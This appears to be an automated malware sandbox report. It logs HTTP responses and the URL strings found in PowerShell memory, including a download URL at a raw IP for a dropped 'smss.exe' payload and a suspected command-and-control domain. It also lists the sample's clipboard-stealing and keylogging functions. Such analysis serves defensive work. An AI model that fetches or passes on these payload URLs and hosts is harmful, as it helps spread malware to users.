75 75 43 68 54 6f 53 78 38 3d Data Ascii: DjqdfNk=Lmxe4T4JobiC2KBV5cy7vnDnOpy2QKauw94u0KDw61IXglKLFovkHFm6fqNTGqdWLQNWpdDJ3qKG9nsTt0wSmMmfdwS9lFdw3S2agwrqbOLAthfn+2Yi2h6+jW7WO1HTtuDC2rYgR+O+kfVqd5QPoYxun2wxF2tushWyDL9opy9n11HeAcqF0q9+7tpGNLuuChToSx8=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Mar 2025 15:00:50 GMTContent-Type: text/htmlContent-Length: 589Connection: closeExpires: 0Cache-control: privateData Raw: 53 6f 72 72 79 2c 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Sorry, Page Not Found
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Wed, 26 Mar 2025 15:00:58 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Wed, 26 Mar 2025 15:01:01 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Wed, 26 Mar 2025 15:01:04 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Wed, 26 Mar 2025 15:01:06 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Mar 2025 15:01:41 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Mar 2025 15:01:44 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Mar 2025 15:01:47 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Mar 2025 15:01:50 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: powershell.exe, 00000003.00000002.1565515176.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.32/70/smss.ex
Source: powershell.exe, 00000003.00000002.1565515176.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.32/70/smss.exe
Source: powershell.exe, 00000003.00000002.1573481868.0000000008011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.32/70/smss.exe0
Source: powershell.exe, 00000003.00000002.1573481868.0000000008011000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.32/70/smss.exe9
Source: powershell.exe, 00000003.00000002.1573481868.0000000007FEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.32/70/smss.exewC:
Source: powershell.exe, 00000003.00000002.1567609765.000000000595B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1563745855.000000000286E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1565515176.00000000048F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000002.2699158883.000000000582C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.855696a.xyz
Source: 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000002.2699158883.000000000582C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.855696a.xyz/q86a/
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1563745855.000000000286E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000003.00000002.1565515176.00000000048F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000003.00000002.1567609765.000000000595B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1567609765.000000000595B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1567609765.000000000595B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1563745855.000000000286E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1570486030.00000000070D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: AtBroker.exe, 0000000C.00000002.2696221255.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: AtBroker.exe, 0000000C.00000002.2696221255.00000000030FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: AtBroker.exe, 0000000C.00000002.2696221255.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: AtBroker.exe, 0000000C.00000002.2696221255.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: AtBroker.exe, 0000000C.00000002.2696221255.00000000030DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: AtBroker.exe, 0000000C.00000002.2696221255.00000000030FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: AtBroker.exe, 0000000C.00000003.1986308875.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000003.00000002.1567609765.000000000595B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: AtBroker.exe, 0000000C.00000003.1993844402.0000000008128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_00A94164
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_00A94164
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A93F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 6_2_00A93F66
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 6_2_00A8001C
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00AACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 6_2_00AACABC

